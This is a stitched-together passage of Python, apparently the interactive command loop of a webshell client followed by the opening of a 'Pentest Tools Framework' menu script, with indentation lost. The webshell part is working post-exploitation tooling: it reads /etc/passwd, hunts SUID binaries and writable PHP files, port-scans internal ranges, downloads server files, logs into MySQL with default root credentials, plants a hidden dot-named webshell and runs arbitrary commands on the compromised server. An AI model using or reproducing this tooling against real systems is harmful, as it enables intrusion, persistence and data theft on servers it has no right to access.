webshell.get_php_version()
elif context == "kv" or context == "kernel_version":
webshell.get_kernel_version()
elif context == "c" or context == "config":
Log.info("Detacting config files...")
webshell.get_config_file()
elif context == "fwd":
webshell.get_writable_directory()
elif context == "gdf":
webshell.get_disabled_functions()
elif context == "fwpf":
webshell.get_writable_php_file()
elif context == "fsb":
webshell.get_suid_binaries()
elif context == "setr":
LOCAL_COMMAND_FLAG = False
elif context == "setl":
LOCAL_COMMAND_FLAG = True
elif context == "dla":
path = raw_input(
"Input path (%s) : " % webshell.webroot) or (webshell.webroot)
args = raw_input("Please custom find args (%s) : " %
(" -size 500k")) or " -size 500k"
Log.info("Using command : find %s %s" % (path, args))
webshell.download_advanced(path, args)
elif context == "dl":
path = raw_input(
"Input path (%s) : " % webshell.webroot) or (webshell.webroot)
if not webshell.file_exists(path):
Log.error("The file [%s] is not exists on the server!" %
(path))
continue
if webshell.is_directory(path):
Log.info(
"The target file is a directory, using recursion download..."
)
filename_filter = raw_input("Input --name '%s' : " %
("*.php")) or "*.php"
webshell.download_recursion(path, filename_filter)
else:
#filename = path.split("/")[-1]
#local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
# Log.info("Using root path : [%s] to save!" % (local_path))
Log.info(
"The target file is a single file, starting download...")
webshell.download(path, path)
elif context == "ps":
hosts = raw_input(
"Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
if not "/" in hosts:
Log.error(
"Please use the format IP/MASK , if want to scan a single host , set MASK=32"
)
continue
ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
) or "21,22,25,80,443,445,3389"
webshell.port_scan(hosts, ports)
elif context == "aiw":
default = random_string(0x10, string.letters)
filename = raw_input("Filename (.%s.php): " %
(default)) or (".%s.php" % (default))
password = raw_input("Password (%s): " % (default)) or ("%s" %
(default))
webshell.auto_inject_webshell(filename, password)
elif context == "r" or context == "read":
filepath = raw_input(
"Input file path (/etc/passwd) : ") or "/etc/passwd"
webshell.read_file(filepath)
elif context == "db" or context == "database":
ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
username = raw_input("Username (root): ") or "root"
password = raw_input("Password (root): ") or "root"
Log.info("Creating connection by [%s:%s] to [%s]..." %
(username, password, ip))
mysql_connection = Mysql(webshell, ip, username, password)
if not mysql_connection.function:
Log.error("The target server cannot support mysql!")
continue
if not mysql_connection.connection_flag:
Log.error("Connection failed!")
continue
Log.success("Connection success!")
if mysql_connection.function != "":
Log.success("Entering database server interactive mode...")
mysql_connection.interactive()
else:
Log.error("No supported database function!")
elif context == "q" or context == "quit" or context == "exit":
Log.info("Quiting...")
break
else:
Log.error("Unsupported function!")
if LOCAL_COMMAND_FLAG == True:
Log.info("Executing command on localhost...")
os.system(context_fresh)
else:
Log.info("Executing command on target server...")
webshell.auto_exec_print(context_fresh)
import os,time,sys
import core
from time import sleep
from ptf import *
from core.exploit import clean
from core.banner import banner,ptf
# Set color
R = '\033[31m' # Red
N = '\033[1;37m' # White
G = '\033[32m' # Green
O = '\033[0;33m' # Orange
B = '\033[1;34m' #Blue
E = '\033[0m' # End
if not os.geteuid() == 0:#Detected user root
sys.exit("""\033[1;91m\n[!] Pentest Tools Framework run as root!!. \n\033[1;m""")
if __name__ == "__main__" or clean() or banner() or ptf():
main()
def main():
while True:
try:
PTF = raw_input("Pentest>> ")
if PTF == 'use modules/exploits':
core.menu.exploits()
main()
elif PTF == 'use modules/scanners':
core.menu.scan()
main()
elif PTF =='use modules/password':
core.menu.pas1()
main()
elif PTF == 'use modules/post':
